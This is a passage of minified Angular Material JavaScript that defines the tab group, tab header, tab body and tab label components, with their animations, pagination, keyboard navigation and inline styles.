vF=new ni("MatTabContent");let Uh=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","matTabContent",""]],features:[ki([{provide:vF,useExisting:t}])]}),t})();const AF=new ni("MatTabLabel"),TF=new ni("MAT_TAB");let V1=(()=>{class t extends N_e{constructor(e,i,n){super(e,i),this._closestTab=n}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(fo),Ee(TF,8))},t.\u0275dir=Ot({type:t,selectors:[["","mat-tab-label",""],["","matTabLabel",""]],features:[ki([{provide:AF,useExisting:t}]),ci]}),t})();const h0e=Jc(class{}),EF=new ni("MAT_TAB_GROUP");let Mu=(()=>{class t extends h0e{constructor(e,i){super(),this._viewContainerRef=e,this._closestTabGroup=i,this.textLabel="",this._contentPortal=null,this._stateChanges=new J,this.position=null,this.origin=null,this.isActive=!1}get templateLabel(){return this._templateLabel}set templateLabel(e){this._setTemplateLabelInput(e)}get content(){return this._contentPortal}ngOnChanges(e){(e.hasOwnProperty("textLabel")||e.hasOwnProperty("disabled"))&&this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}ngOnInit(){this._contentPortal=new Mm(this._explicitContent||this._implicitContent,this._viewContainerRef)}_setTemplateLabelInput(e){e&&e._closestTab===this&&(this._templateLabel=e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(EF,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab"]],contentQueries:function(e,i,n){if(1&e&&(ha(n,AF,5),ha(n,vF,7,ho)),2&e){let r;Vt(r=Bt())&&(i.templateLabel=r.first),Vt(r=Bt())&&(i._explicitContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(ho,7),2&e){let n;Vt(n=Bt())&&(i._implicitContent=n.first)}},inputs:{disabled:"disabled",textLabel:["label","textLabel"],ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],labelClass:"labelClass",bodyClass:"bodyClass"},exportAs:["matTab"],features:[ki([{provide:TF,useExisting:t}]),ci,sa],ngContentSelectors:bF,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),ne(0,Kge,1,0,"ng-template"))},encapsulation:2}),t})();const f0e={translateTab:ar("translateTab",[sn("center, void, left-origin-center, right-origin-center",zi({transform:"none"})),sn("left",zi({transform:"translate3d(-100%, 0, 0)",minHeight:"1px",visibility:"hidden"})),sn("right",zi({transform:"translate3d(100%, 0, 0)",minHeight:"1px",visibility:"hidden"})),gn("* => left, * => right, left => center, right => center",En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")),gn("void => left-origin-center",[zi({transform:"translate3d(-100%, 0, 0)",visibility:"hidden"}),En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")]),gn("void => right-origin-center",[zi({transform:"translate3d(100%, 0, 0)",visibility:"hidden"}),En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")])])};let p0e=(()=>{class t extends Cu{constructor(e,i,n,r){super(e,i,r),this._host=n,this._centeringSub=I.EMPTY,this._leavingSub=I.EMPTY}ngOnInit(){super.ngOnInit(),this._centeringSub=this._host._beforeCentering.pipe(Ro(this._host._isCenterPosition(this._host._position))).subscribe(e=>{e&&!this.hasAttached()&&this.attach(this._host._content)}),this._leavingSub=this._host._afterLeavingCenter.subscribe(()=>{this._host.preserveContent||this.detach()})}ngOnDestroy(){super.ngOnDestroy(),this._centeringSub.unsubscribe(),this._leavingSub.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(On),Ee(fo),Ee(ja(()=>DF)),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","matTabBodyHost",""]],features:[ci]}),t})(),_0e=(()=>{class t{constructor(e,i,n){this._elementRef=e,this._dir=i,this._dirChangeSubscription=I.EMPTY,this._translateTabComplete=new J,this._onCentering=new Tt,this._beforeCentering=new Tt,this._afterLeavingCenter=new Tt,this._onCentered=new Tt(!0),this.animationDuration="500ms",this.preserveContent=!1,i&&(this._dirChangeSubscription=i.change.subscribe(r=>{this._computePositionAnimationState(r),n.markForCheck()})),this._translateTabComplete.pipe(Bh((r,c)=>r.fromState===c.fromState&&r.toState===c.toState)).subscribe(r=>{this._isCenterPosition(r.toState)&&this._isCenterPosition(this._position)&&this._onCentered.emit(),this._isCenterPosition(r.fromState)&&!this._isCenterPosition(this._position)&&this._afterLeavingCenter.emit()})}set position(e){this._positionIndex=e,this._computePositionAnimationState()}ngOnInit(){"center"==this._position&&null!=this.origin&&(this._position=this._computePositionFromOrigin(this.origin))}ngOnDestroy(){this._dirChangeSubscription.unsubscribe(),this._translateTabComplete.complete()}_onTranslateTabStarted(e){const i=this._isCenterPosition(e.toState);this._beforeCentering.emit(i),i&&this._onCentering.emit(this._elementRef.nativeElement.clientHeight)}_getLayoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_isCenterPosition(e){return"center"==e||"left-origin-center"==e||"right-origin-center"==e}_computePositionAnimationState(e=this._getLayoutDirection()){this._position=this._positionIndex<0?"ltr"==e?"left":"right":this._positionIndex>0?"ltr"==e?"right":"left":"center"}_computePositionFromOrigin(e){const i=this._getLayoutDirection();return"ltr"==i&&e<=0||"rtl"==i&&e>0?"left-origin-center":"right-origin-center"}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Cr,8),Ee(Ma))},t.\u0275dir=Ot({type:t,inputs:{_content:["content","_content"],origin:"origin",animationDuration:"animationDuration",preserveContent:"preserveContent",position:"position"},outputs:{_onCentering:"_onCentering",_beforeCentering:"_beforeCentering",_afterLeavingCenter:"_afterLeavingCenter",_onCentered:"_onCentered"}}),t})(),DF=(()=>{class t extends _0e{constructor(e,i,n){super(e,i,n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Cr,8),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-body"]],viewQuery:function(e,i){if(1&e&&Mi(Cu,5),2&e){let n;Vt(n=Bt())&&(i._portalHost=n.first)}},hostAttrs:[1,"mat-tab-body"],features:[ci],decls:3,vars:6,consts:[["cdkScrollable","",1,"mat-tab-body-content"],["content",""],["matTabBodyHost",""]],template:function(e,i){1&e&&(m(0,"div",0,1),he("@translateTab.start",function(r){return i._onTranslateTabStarted(r)})("@translateTab.done",function(r){return i._translateTabComplete.next(r)}),ne(2,Xge,0,0,"ng-template",2),u()),2&e&&V("@translateTab",Ah(3,Jge,i._position,fr(1,Yge,i.animationDuration)))},dependencies:[p0e],styles:['.mat-tab-body-content{height:100%;overflow:auto}.mat-tab-group-dynamic-height .mat-tab-body-content{overflow:hidden}.mat-tab-body-content[style*="visibility: hidden"]{display:none}'],encapsulation:2,data:{animation:[f0e.translateTab]}}),t})();const xF=new ni("MAT_TABS_CONFIG"),g0e=Jc(class{});let wF=(()=>{class t extends g0e{constructor(e){super(),this.elementRef=e}focus(){this.elementRef.nativeElement.focus()}getOffsetLeft(){return this.elementRef.nativeElement.offsetLeft}getOffsetWidth(){return this.elementRef.nativeElement.offsetWidth}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","matTabLabelWrapper",""]],hostVars:3,hostBindings:function(e,i){2&e&&(Rt("aria-disabled",!!i.disabled),Ct("mat-tab-disabled",i.disabled))},inputs:{disabled:"disabled"},features:[ci]}),t})();const IF=ym({passive:!0});let b0e=(()=>{class t{constructor(e,i,n,r,c,d,T){this._elementRef=e,this._changeDetectorRef=i,this._viewportRuler=n,this._dir=r,this._ngZone=c,this._platform=d,this._animationMode=T,this._scrollDistance=0,this._selectedIndexChanged=!1,this._destroyed=new J,this._showPaginationControls=!1,this._disableScrollAfter=!0,this._disableScrollBefore=!0,this._stopScrolling=new J,this._disablePagination=!1,this._selectedIndex=0,this.selectFocusedIndex=new Tt,this.indexFocused=new Tt,c.runOutsideAngular(()=>{Tc(e.nativeElement,"mouseleave").pipe(ea(this._destroyed)).subscribe(()=>{this._stopInterval()})})}get disablePagination(){return this._disablePagination}set disablePagination(e){this._disablePagination=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){e=Uo(e),this._selectedIndex!=e&&(this._selectedIndexChanged=!0,this._selectedIndex=e,this._keyManager&&this._keyManager.updateActiveItem(e))}ngAfterViewInit(){Tc(this._previousPaginator.nativeElement,"touchstart",IF).pipe(ea(this._destroyed)).subscribe(()=>{this._handlePaginatorPress("before")}),Tc(this._nextPaginator.nativeElement,"touchstart",IF).pipe(ea(this._destroyed)).subscribe(()=>{this._handlePaginatorPress("after")})}ngAfterContentInit(){const e=this._dir?this._dir.change:Bi("ltr"),i=this._viewportRuler.change(150),n=()=>{this.updatePagination(),this._alignInkBarToSelectedTab()};this._keyManager=new L1(this._items).withHorizontalOrientation(this._getLayoutDirection()).withHomeAndEnd().withWrap(),this._keyManager.updateActiveItem(this._selectedIndex),this._ngZone.onStable.pipe(Cn(1)).subscribe(n),ra(e,i,this._items.changes,this._itemsResized()).pipe(ea(this._destroyed)).subscribe(()=>{this._ngZone.run(()=>{Promise.resolve().then(()=>{this._scrollDistance=Math.max(0,Math.min(this._getMaxScrollDistance(),this._scrollDistance)),n()})}),this._keyManager.withHorizontalOrientation(this._getLayoutDirection())}),this._keyManager.change.pipe(ea(this._destroyed)).subscribe(r=>{this.indexFocused.emit(r),this._setTabFocus(r)})}_itemsResized(){return"function"!=typeof ResizeObserver?ua:this._items.changes.pipe(Ro(this._items),Ur(e=>new G(i=>this._ngZone.runOutsideAngular(()=>{const n=new ResizeObserver(()=>{i.next()});return e.forEach(r=>{n.observe(r.elementRef.nativeElement)}),()=>{n.disconnect()}}))),Sw(1))}ngAfterContentChecked(){this._tabLabelCount!=this._items.length&&(this.updatePagination(),this._tabLabelCount=this._items.length,this._changeDetectorRef.markForCheck()),this._selectedIndexChanged&&(this._scrollToLabel(this._selectedIndex),this._checkScrollingControls(),this._alignInkBarToSelectedTab(),this._selectedIndexChanged=!1,this._changeDetectorRef.markForCheck()),this._scrollDistanceChanged&&(this._updateTabScrollPosition(),this._scrollDistanceChanged=!1,this._changeDetectorRef.markForCheck())}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete(),this._stopScrolling.complete()}_handleKeydown(e){if(!Zr(e))switch(e.keyCode){case 13:case 32:this.focusIndex!==this.selectedIndex&&(this.selectFocusedIndex.emit(this.focusIndex),this._itemSelected(e));break;default:this._keyManager.onKeydown(e)}}_onContentChanges(){const e=this._elementRef.nativeElement.textContent;e!==this._currentTextContent&&(this._currentTextContent=e||"",this._ngZone.run(()=>{this.updatePagination(),this._alignInkBarToSelectedTab(),this._changeDetectorRef.markForCheck()}))}updatePagination(){this._checkPaginationEnabled(),this._checkScrollingControls(),this._updateTabScrollPosition()}get focusIndex(){return this._keyManager?this._keyManager.activeItemIndex:0}set focusIndex(e){!this._isValidIndex(e)||this.focusIndex===e||!this._keyManager||this._keyManager.setActiveItem(e)}_isValidIndex(e){if(!this._items)return!0;const i=this._items?this._items.toArray()[e]:null;return!!i&&!i.disabled}_setTabFocus(e){if(this._showPaginationControls&&this._scrollToLabel(e),this._items&&this._items.length){this._items.toArray()[e].focus();const i=this._tabListContainer.nativeElement;i.scrollLeft="ltr"==this._getLayoutDirection()?0:i.scrollWidth-i.offsetWidth}}_getLayoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_updateTabScrollPosition(){if(this.disablePagination)return;const e=this.scrollDistance,i="ltr"===this._getLayoutDirection()?-e:e;this._tabList.nativeElement.style.transform=`translateX(${Math.round(i)}px)`,(this._platform.TRIDENT||this._platform.EDGE)&&(this._tabListContainer.nativeElement.scrollLeft=0)}get scrollDistance(){return this._scrollDistance}set scrollDistance(e){this._scrollTo(e)}_scrollHeader(e){return this._scrollTo(this._scrollDistance+("before"==e?-1:1)*this._tabListContainer.nativeElement.offsetWidth/3)}_handlePaginatorClick(e){this._stopInterval(),this._scrollHeader(e)}_scrollToLabel(e){if(this.disablePagination)return;const i=this._items?this._items.toArray()[e]:null;if(!i)return;const n=this._tabListContainer.nativeElement.offsetWidth,{offsetLeft:r,offsetWidth:c}=i.elementRef.nativeElement;let d,T;"ltr"==this._getLayoutDirection()?(d=r,T=d+c):(T=this._tabListInner.nativeElement.offsetWidth-r,d=T-c);const k=this.scrollDistance,q=this.scrollDistance+n;d<k?this.scrollDistance-=k-d+60:T>q&&(this.scrollDistance+=T-q+60)}_checkPaginationEnabled(){if(this.disablePagination)this._showPaginationControls=!1;else{const e=this._tabListInner.nativeElement.scrollWidth>this._elementRef.nativeElement.offsetWidth;e||(this.scrollDistance=0),e!==this._showPaginationControls&&this._changeDetectorRef.markForCheck(),this._showPaginationControls=e}}_checkScrollingControls(){this.disablePagination?this._disableScrollAfter=this._disableScrollBefore=!0:(this._disableScrollBefore=0==this.scrollDistance,this._disableScrollAfter=this.scrollDistance==this._getMaxScrollDistance(),this._changeDetectorRef.markForCheck())}_getMaxScrollDistance(){return this._tabListInner.nativeElement.scrollWidth-this._tabListContainer.nativeElement.offsetWidth||0}_alignInkBarToSelectedTab(){const e=this._items&&this._items.length?this._items.toArray()[this.selectedIndex]:null,i=e?e.elementRef.nativeElement:null;i?this._inkBar.alignToElement(i):this._inkBar.hide()}_stopInterval(){this._stopScrolling.next()}_handlePaginatorPress(e,i){i&&null!=i.button&&0!==i.button||(this._stopInterval(),M3(650,100).pipe(ea(ra(this._stopScrolling,this._destroyed))).subscribe(()=>{const{maxScrollDistance:n,distance:r}=this._scrollHeader(e);(0===r||r>=n)&&this._stopInterval()}))}_scrollTo(e){if(this.disablePagination)return{maxScrollDistance:0,distance:0};const i=this._getMaxScrollDistance();return this._scrollDistance=Math.max(0,Math.min(i,e)),this._scrollDistanceChanged=!0,this._checkScrollingControls(),{maxScrollDistance:i,distance:this._scrollDistance}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(sr),Ee(ir,8))},t.\u0275dir=Ot({type:t,inputs:{disablePagination:"disablePagination"}}),t})(),M0e=(()=>{class t extends b0e{constructor(e,i,n,r,c,d,T){super(e,i,n,r,c,d,T),this._disableRipple=!1}get disableRipple(){return this._disableRipple}set disableRipple(e){this._disableRipple=wi(e)}_itemSelected(e){e.preventDefault()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(sr),Ee(ir,8))},t.\u0275dir=Ot({type:t,inputs:{disableRipple:"disableRipple"},features:[ci]}),t})(),v0e=(()=>{class t extends M0e{constructor(e,i,n,r,c,d,T){super(e,i,n,r,c,d,T)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(sr),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-header"]],contentQueries:function(e,i,n){if(1&e&&ha(n,wF,4),2&e){let r;Vt(r=Bt())&&(i._items=r)}},viewQuery:function(e,i){if(1&e&&(Mi(MF,7),Mi(Zge,7),Mi(e0e,7),Mi(t0e,7),Mi(i0e,5),Mi(a0e,5)),2&e){let n;Vt(n=Bt())&&(i._inkBar=n.first),Vt(n=Bt())&&(i._tabListContainer=n.first),Vt(n=Bt())&&(i._tabList=n.first),Vt(n=Bt())&&(i._tabListInner=n.first),Vt(n=Bt())&&(i._nextPaginator=n.first),Vt(n=Bt())&&(i._previousPaginator=n.first)}},hostAttrs:[1,"mat-tab-header"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-tab-header-pagination-controls-enabled",i._showPaginationControls)("mat-tab-header-rtl","rtl"==i._getLayoutDirection())},inputs:{selectedIndex:"selectedIndex"},outputs:{selectFocusedIndex:"selectFocusedIndex",indexFocused:"indexFocused"},features:[ci],ngContentSelectors:bF,decls:14,vars:10,consts:[["aria-hidden","true","type","button","mat-ripple","","tabindex","-1",1,"mat-tab-header-pagination","mat-tab-header-pagination-before","mat-elevation-z4",3,"matRippleDisabled","disabled","click","mousedown","touchend"],["previousPaginator",""],[1,"mat-tab-header-pagination-chevron"],[1,"mat-tab-label-container",3,"keydown"],["tabListContainer",""],["role","tablist",1,"mat-tab-list",3,"cdkObserveContent"],["tabList",""],[1,"mat-tab-labels"],["tabListInner",""],["aria-hidden","true","type","button","mat-ripple","","tabindex","-1",1,"mat-tab-header-pagination","mat-tab-header-pagination-after","mat-elevation-z4",3,"matRippleDisabled","disabled","mousedown","click","touchend"],["nextPaginator",""]],template:function(e,i){1&e&&(Jn(),m(0,"button",0,1),he("click",function(){return i._handlePaginatorClick("before")})("mousedown",function(r){return i._handlePaginatorPress("before",r)})("touchend",function(){return i._stopInterval()}),it(2,"div",2),u(),m(3,"div",3,4),he("keydown",function(r){return i._handleKeydown(r)}),m(5,"div",5,6),he("cdkObserveContent",function(){return i._onContentChanges()}),m(7,"div",7,8),va(9),u(),it(10,"mat-ink-bar"),u()(),m(11,"button",9,10),he("mousedown",function(r){return i._handlePaginatorPress("after",r)})("click",function(){return i._handlePaginatorClick("after")})("touchend",function(){return i._stopInterval()}),it(13,"div",2),u()),2&e&&(Ct("mat-tab-header-pagination-disabled",i._disableScrollBefore),V("matRippleDisabled",i._disableScrollBefore||i.disableRipple)("disabled",i._disableScrollBefore||null),C(5),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode),C(6),Ct("mat-tab-header-pagination-disabled",i._disableScrollAfter),V("matRippleDisabled",i._disableScrollAfter||i.disableRipple)("disabled",i._disableScrollAfter||null))},dependencies:[xl,P3,MF],styles:[".mat-tab-header{display:flex;overflow:hidden;position:relative;flex-shrink:0}.mat-tab-header-pagination{-webkit-user-select:none;user-select:none;position:relative;display:none;justify-content:center;align-items:center;min-width:32px;cursor:pointer;z-index:2;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:none;box-sizing:content-box;background:none;border:none;outline:0;padding:0}.mat-tab-header-pagination::-moz-focus-inner{border:0}.mat-tab-header-pagination-controls-enabled .mat-tab-header-pagination{display:flex}.mat-tab-header-pagination-before,.mat-tab-header-rtl .mat-tab-header-pagination-after{padding-left:4px}.mat-tab-header-pagination-before .mat-tab-header-pagination-chevron,.mat-tab-header-rtl .mat-tab-header-pagination-after .mat-tab-header-pagination-chevron{transform:rotate(-135deg)}.mat-tab-header-rtl .mat-tab-header-pagination-before,.mat-tab-header-pagination-after{padding-right:4px}.mat-tab-header-rtl .mat-tab-header-pagination-before .mat-tab-header-pagination-chevron,.mat-tab-header-pagination-after .mat-tab-header-pagination-chevron{transform:rotate(45deg)}.mat-tab-header-pagination-chevron{border-style:solid;border-width:2px 2px 0 0;height:8px;width:8px}.mat-tab-header-pagination-disabled{box-shadow:none;cursor:default}.mat-tab-list{flex-grow:1;position:relative;transition:transform 500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-ink-bar{position:absolute;bottom:0;height:2px;transition:500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-ink-bar._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-group-inverted-header .mat-ink-bar{bottom:auto;top:0}.cdk-high-contrast-active .mat-ink-bar{outline:solid 2px;height:0}.mat-tab-labels{display:flex}[mat-align-tabs=center]>.mat-tab-header .mat-tab-labels{justify-content:center}[mat-align-tabs=end]>.mat-tab-header .mat-tab-labels{justify-content:flex-end}.mat-tab-label-container{display:flex;flex-grow:1;overflow:hidden;z-index:1}.mat-tab-list._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-label{height:48px;padding:0 24px;cursor:pointer;box-sizing:border-box;opacity:.6;min-width:160px;text-align:center;display:inline-flex;justify-content:center;align-items:center;white-space:nowrap;position:relative}.mat-tab-label:focus{outline:none}.mat-tab-label:focus:not(.mat-tab-disabled){opacity:1}.mat-tab-label.mat-tab-disabled{cursor:default}.cdk-high-contrast-active .mat-tab-label.mat-tab-disabled{opacity:.5}.mat-tab-label .mat-tab-label-content{display:inline-flex;justify-content:center;align-items:center;white-space:nowrap}.cdk-high-contrast-active .mat-tab-label{opacity:1}.mat-tab-label::before{margin:5px}@media(max-width: 599px){.mat-tab-label{min-width:72px}}"],encapsulation:2}),t})(),A0e=0;class T0e{}const E0e=kd(Dl(class{constructor(t){this._elementRef=t}}),"primary");let D0e=(()=>{class t extends E0e{constructor(e,i,n,r){var c;super(e),this._changeDetectorRef=i,this._animationMode=r,this._tabs=new gd,this._indexToSelect=0,this._lastFocusedTabIndex=null,this._tabBodyWrapperHeight=0,this._tabsSubscription=I.EMPTY,this._tabLabelSubscription=I.EMPTY,this._dynamicHeight=!1,this._selectedIndex=null,this.headerPosition="above",this._disablePagination=!1,this._preserveContent=!1,this.selectedIndexChange=new Tt,this.focusChange=new Tt,this.animationDone=new Tt,this.selectedTabChange=new Tt(!0),this._groupId=A0e++,this.animationDuration=n&&n.animationDuration?n.animationDuration:"500ms",this.disablePagination=!(!n||null==n.disablePagination)&&n.disablePagination,this.dynamicHeight=!(!n||null==n.dynamicHeight)&&n.dynamicHeight,this.contentTabIndex=null!==(c=null==n?void 0:n.contentTabIndex)&&void 0!==c?c:null,this.preserveContent=!(null==n||!n.preserveContent)}get dynamicHeight(){return this._dynamicHeight}set dynamicHeight(e){this._dynamicHeight=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){this._indexToSelect=Uo(e,null)}get animationDuration(){return this._animationDuration}set animationDuration(e){this._animationDuration=/^\d+$/.test(e+"")?e+"ms":e}get contentTabIndex(){return this._contentTabIndex}set contentTabIndex(e){this._contentTabIndex=Uo(e,null)}get disablePagination(){return this._disablePagination}set disablePagination(e){this._disablePagination=wi(e)}get preserveContent(){return this._preserveContent}set preserveContent(e){this._preserveContent=wi(e)}get backgroundColor(){return this._backgroundColor}set backgroundColor(e){const i=this._elementRef.nativeElement;i.classList.remove(`mat-background-${this.backgroundColor}`),e&&i.classList.add(`mat-background-${e}`),this._backgroundColor=e}ngAfterContentChecked(){const e=this._indexToSelect=this._clampTabIndex(this._indexToSelect);if(this._selectedIndex!=e){const i=null==this._selectedIndex;if(!i){this.selectedTabChange.emit(this._createChangeEvent(e));const n=this._tabBodyWrapper.nativeElement;n.style.minHeight=n.clientHeight+"px"}Promise.resolve().then(()=>{this._tabs.forEach((n,r)=>n.isActive=r===e),i||(this.selectedIndexChange.emit(e),this._tabBodyWrapper.nativeElement.style.minHeight="")})}this._tabs.forEach((i,n)=>{i.position=n-e,null!=this._selectedIndex&&0==i.position&&!i.origin&&(i.origin=e-this._selectedIndex)}),this._selectedIndex!==e&&(this._selectedIndex=e,this._lastFocusedTabIndex=null,this._changeDetectorRef.markForCheck())}ngAfterContentInit(){this._subscribeToAllTabChanges(),this._subscribeToTabLabels(),this._tabsSubscription=this._tabs.changes.subscribe(()=>{const e=this._clampTabIndex(this._indexToSelect);if(e===this._selectedIndex){const i=this._tabs.toArray();let n;for(let r=0;r<i.length;r++)if(i[r].isActive){this._indexToSelect=this._selectedIndex=r,this._lastFocusedTabIndex=null,n=i[r];break}!n&&i[e]&&Promise.resolve().then(()=>{i[e].isActive=!0,this.selectedTabChange.emit(this._createChangeEvent(e))})}this._changeDetectorRef.markForCheck()})}_subscribeToAllTabChanges(){this._allTabs.changes.pipe(Ro(this._allTabs)).subscribe(e=>{this._tabs.reset(e.filter(i=>i._closestTabGroup===this||!i._closestTabGroup)),this._tabs.notifyOnChanges()})}ngOnDestroy(){this._tabs.destroy(),this._tabsSubscription.unsubscribe(),this._tabLabelSubscription.unsubscribe()}realignInkBar(){this._tabHeader&&this._tabHeader._alignInkBarToSelectedTab()}updatePagination(){this._tabHeader&&this._tabHeader.updatePagination()}focusTab(e){const i=this._tabHeader;i&&(i.focusIndex=e)}_focusChanged(e){this._lastFocusedTabIndex=e,this.focusChange.emit(this._createChangeEvent(e))}_createChangeEvent(e){const i=new T0e;return i.index=e,this._tabs&&this._tabs.length&&(i.tab=this._tabs.toArray()[e]),i}_subscribeToTabLabels(){this._tabLabelSubscription&&this._tabLabelSubscription.unsubscribe(),this._tabLabelSubscription=ra(...this._tabs.map(e=>e._stateChanges)).subscribe(()=>this._changeDetectorRef.markForCheck())}_clampTabIndex(e){return Math.min(this._tabs.length-1,Math.max(e||0,0))}_getTabLabelId(e){return`mat-tab-label-${this._groupId}-${e}`}_getTabContentId(e){return`mat-tab-content-${this._groupId}-${e}`}_setTabBodyWrapperHeight(e){if(!this._dynamicHeight||!this._tabBodyWrapperHeight)return;const i=this._tabBodyWrapper.nativeElement;i.style.height=this._tabBodyWrapperHeight+"px",this._tabBodyWrapper.nativeElement.offsetHeight&&(i.style.height=e+"px")}_removeTabBodyWrapperHeight(){const e=this._tabBodyWrapper.nativeElement;this._tabBodyWrapperHeight=e.clientHeight,e.style.height="",this.animationDone.emit()}_handleClick(e,i,n){e.disabled||(this.selectedIndex=i.focusIndex=n)}_getTabIndex(e,i){var n;return e.disabled?null:i===(null!==(n=this._lastFocusedTabIndex)&&void 0!==n?n:this.selectedIndex)?0:-1}_tabFocusChanged(e,i){e&&"mouse"!==e&&"touch"!==e&&(this._tabHeader.focusIndex=i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(xF,8),Ee(ir,8))},t.\u0275dir=Ot({type:t,inputs:{dynamicHeight:"dynamicHeight",selectedIndex:"selectedIndex",headerPosition:"headerPosition",animationDuration:"animationDuration",contentTabIndex:"contentTabIndex",disablePagination:"disablePagination",preserveContent:"preserveContent",backgroundColor:"backgroundColor"},outputs:{selectedIndexChange:"selectedIndexChange",focusChange:"focusChange",animationDone:"animationDone",selectedTabChange:"selectedTabChange"},features:[ci]}),t})(),qh=(()=>{class t extends D0e{constructor(e,i,n,r){super(e,i,n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(xF,8),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-group"]],contentQueries:function(e,i,n){if(1&e&&ha(n,Mu,5),2&e){let r;Vt(r=Bt())&&(i._allTabs=r)}},viewQuery:function(e,i){if(1&e&&(Mi(n0e,5),Mi(o0e,5)),2&e){let n;Vt(n=Bt())&&(i._tabBodyWrapper=n.first),Vt(n=Bt())&&(i._tabHeader=n.first)}},hostAttrs:[1,"mat-tab-group"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-tab-group-dynamic-height",i.dynamicHeight)("mat-tab-group-inverted-header","below"===i.headerPosition)},inputs:{color:"color",disableRipple:"disableRipple"},exportAs:["matTabGroup"],features:[ki([{provide:EF,useExisting:t}]),ci],decls:6,vars:7,consts:[[3,"selectedIndex","disableRipple","disablePagination","indexFocused","selectFocusedIndex"],["tabHeader",""],["class","mat-tab-label mat-focus-indicator","role","tab","matTabLabelWrapper","","mat-ripple","","cdkMonitorElementFocus","",3,"id","mat-tab-label-active","ngClass","disabled","matRippleDisabled","click","cdkFocusChange",4,"ngFor","ngForOf"],[1,"mat-tab-body-wrapper"],["tabBodyWrapper",""],["role","tabpanel",3,"id","mat-tab-body-active","ngClass","content","position","origin","animationDuration","preserveContent","_onCentered","_onCentering",4,"ngFor","ngForOf"],["role","tab","matTabLabelWrapper","","mat-ripple","","cdkMonitorElementFocus","",1,"mat-tab-label","mat-focus-indicator",3,"id","ngClass","disabled","matRippleDisabled","click","cdkFocusChange"],[1,"mat-tab-label-content"],[3,"ngIf","ngIfElse"],["tabTextLabel",""],[3,"cdkPortalOutlet"],["role","tabpanel",3,"id","ngClass","content","position","origin","animationDuration","preserveContent","_onCentered","_onCentering"]],template:function(e,i){1&e&&(m(0,"mat-tab-header",0,1),he("indexFocused",function(r){return i._focusChanged(r)})("selectFocusedIndex",function(r){return i.selectedIndex=r}),ne(2,l0e,5,15,"div",2),u(),m(3,"div",3,4),ne(5,d0e,1,11,"mat-tab-body",5),u()),2&e&&(V("selectedIndex",i.selectedIndex||0)("disableRipple",i.disableRipple)("disablePagination",i.disablePagination),C(2),V("ngForOf",i._tabs),C(1),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode),C(2),V("ngForOf",i._tabs))},dependencies:[ag,Zi,Ri,Cu,xl,dpe,wF,DF,v0e],styles:[".mat-tab-group{display:flex;flex-direction:column;max-width:100%}.mat-tab-group.mat-tab-group-inverted-header{flex-direction:column-reverse}.mat-tab-label{height:48px;padding:0 24px;cursor:pointer;box-sizing:border-box;opacity:.6;min-width:160px;text-align:center;display:inline-flex;justify-content:center;align-items:center;white-space:nowrap;position:relative}.mat-tab-label:focus{outline:none}.mat-tab-label:focus:not(.mat-tab-disabled){opacity:1}.mat-tab-label.mat-tab-disabled{cursor:default}.cdk-high-contrast-active .mat-tab-label.mat-tab-disabled{opacity:.5}.mat-tab-label .mat-tab-label-content{display:inline-flex;justify-content:center;align-items:center;white-space:nowrap}.cdk-high-contrast-active .mat-tab-label{opacity:1}@media(max-width: 599px){.mat-tab-label{padding:0 12px}}@media(max-width: 959px){.mat-tab-label{padding:0 12px}}.mat-tab-group[mat-stretch-tabs]>.mat-tab-header .mat-tab-label{flex-basis:0;flex-grow:1}.mat-tab-body-wrapper{position:relative;overflow:hidden;display:flex;transition:height 500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-tab-body-wrapper._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-body{top:0;left:0;right:0;bottom:0;position:absolute;display:block;overflow:hidden;outline:0;flex-basis:100%}.mat-tab-body.mat-tab-body-active{position:relative;overflow-x:hidden;overflow-y:auto;z-index:1;flex-grow:1}.mat-tab-group.mat-tab-group-dynamic-height .mat-tab-body.mat-tab-body-active{overflow-y:hidden}"],encapsulation:2}),t})(),SF=(()=>{class 